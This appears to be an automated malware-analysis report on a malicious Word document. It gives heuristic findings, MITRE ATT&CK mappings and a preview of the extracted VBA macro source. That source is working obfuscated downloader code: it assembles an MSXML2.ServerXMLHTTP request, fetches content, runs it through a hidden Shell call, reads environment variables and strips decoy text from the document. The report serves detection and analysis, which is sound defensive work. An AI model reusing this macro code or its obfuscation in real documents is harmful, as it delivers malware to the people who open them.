MALICIOUS
190
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is a malicious Word document containing VBA macros. The `OLE_VBA_SHELL` and `OLE_VBA_PCODE_AUTOEXEC_EXEC` heuristics indicate the presence of a macro that uses the `Shell` function, likely to execute a downloaded payload. The `CreateObject` call and the string `ML2.ServerXMLHTTP` suggest the macro attempts to interact with the network to fetch additional content.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
bydd = Shell(a, 0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Nqhdkjahsjdhjkqwhkdqwh = CreateObject(BTYQWFDYFQWTDWQAA) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Goabc = Environ(sps) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2342 bytes |
SHA-256: f66fa68bb2929153969d22deab3a767c8fb71b7d9d53ce5343d072e8ea223527 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Hameleon()
Dim ij As Integer
Dim charCount As Integer
charCount = ActiveDocument.Characters.Count - 1
ij = 0
Do While True
ij = ij + 1
If (ActiveDocument.Characters(ij) = "#") Then
If (ActiveDocument.Characters(ij - 1) = "$") Then
ActiveDocument.Range(Start:=0, End:=ij).Delete
ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack
Exit Do
End If
End If
If (ij = charCount) Then
Exit Do
End If
Loop
End Sub
Public Function Goabc(sps As String)
AAUQWHDQW = "178231789378291e"
Goabc = Environ(sps)
End Function
Attribute VB_Name = "Module2"
Public Function Puhlo(a As String)
Dim bydd As Variant
bydd = Shell(a, 0)
End Function
Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Nqhdkjahsjdhjkqwhkdqwh As Object, AHUDWQI As String
Dim ashdUHhda As String, dddc As Integer, AABDBHDDD As String, AsaHuhqdjhasd As String, AAHQJD As String
AsaHuhqdjhasd = nbqjbdjqw
ashdUHhda = AsaHuhqdjhasd
'hujdhgq
dddc = 1 - (Atn(20))
HQDUQ = hhr(Val(81 + dddc))
BHQDHJWQDW = "ML2.ServerXMLH"
BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ
'nasdhjkqwqd
AABDBHDDD = "E"
NBWHDWDQ = Chr(44 * 1 * 2 + 1 * 4 * dddc)
AABDBHDDD = "G" + AABDBHDDD & NBWHDWDQ
BTYQWFDYFQWTDWQAA = "MSX" + BYGDWHQGWHDWQ
'djqhdkasdkhsj
Set Nqhdkjahsjdhjkqwhkdqwh = CreateObject(BTYQWFDYFQWTDWQAA)
Nqhdkjahsjdhjkqwhkdqwh.Open AABDBHDDD, ashdUHhda
Nqhdkjahsjdhjkqwhkdqwh.Send (AHUDWQI)
AAHQJD = ThisDocument.NHdjhasbdhas(Nqhdkjahsjdhjkqwhkdqwh)
Linolium = AAHQJD
End Function
Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Kakarumba(n As Integer)
Dim i As Integer
For i = 1 To n Step 1
Randomize
Kakarumba = Kakarumba + Chr(Int(121 * Rnd) + 97)
Next i
End Function
Public Function hhr(sps As Integer)
hhr = Chr(sps)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.